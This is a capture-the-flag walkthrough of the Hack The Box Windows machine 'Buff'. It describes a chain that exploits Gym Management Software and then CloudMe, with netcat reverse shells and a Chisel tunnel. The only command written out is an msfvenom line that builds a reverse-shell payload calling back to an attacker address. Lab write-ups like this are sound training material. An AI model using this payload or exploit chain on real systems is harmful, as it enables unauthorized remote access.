Walkthrough — HTB Windows machine “Buff”

Quick enumeration of the machine with nmap revealed the following information:

A quick look at the content provided by the HTTP server:

Browsing through the site hints the software is PHP, and using “Gym Management Software 1.0”:

A quick look online leads me to an unverified exploit on Exploit-DB (https://www.exploit-db.com/exploits/48506). Glancing through the code, no changes are required, so I just run with it — and then had to make a few modifications in order for it to work with Python3. We get there eventually:

Let’s see if it works:

I was hoping for a reverse shell. Nevertheless, the exploit appears to have successfully created the PHP script on the target:

We do appear to have command execution:

With this, I was able to copy across netcat, hosted by a local Python3 HTTP server:

And then initiate a reverse shell:

Further enumeration from within the system revealed CloudMe.exe running:

We can see Shaun, the current user, downloaded it — we’re also given the software version:

Browsing online, I was able to find an exploit on Exploit DB(https://www.exploit-db.com/exploits/48389). Reading through the exploit, it is evident a connection is required to port 8888 — this did not show up on my initial scan, but local enumeration revealed the port is accessible:

I modified the exploit to initiate another reverse shell, taking into account the bad characters referenced in the initial exploit:

msfvenom -a x86 -p windows/shell_reverse_tcp LPORT=53 LHOST=10.10.14.6 -b ‘\x00\x0A\x0D’ -f python -v payload

I used transferred across plink.exe, and planned to use this to forward the port to my local Kali machine — but after far longer than I’d have liked, I gave up and moved to a different tool:

I transferred across Chisel(https://github.com/jpillora/chisel/releases):

And used it to generate a tunnel, so port 8888 on the server is now available locally:

And finally, upon executing the Python exploit we modified earlier, we are presented with a shell from the administrator account on the Buff server caught by my netcat listener on port 53: